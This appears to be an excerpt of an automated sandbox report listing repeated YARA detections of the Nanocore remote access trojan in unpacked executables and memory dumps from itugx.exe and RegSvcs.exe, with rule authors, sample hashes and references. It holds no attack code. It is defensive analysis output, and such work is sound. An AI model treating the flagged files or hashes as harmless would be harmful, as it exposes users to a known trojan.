Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
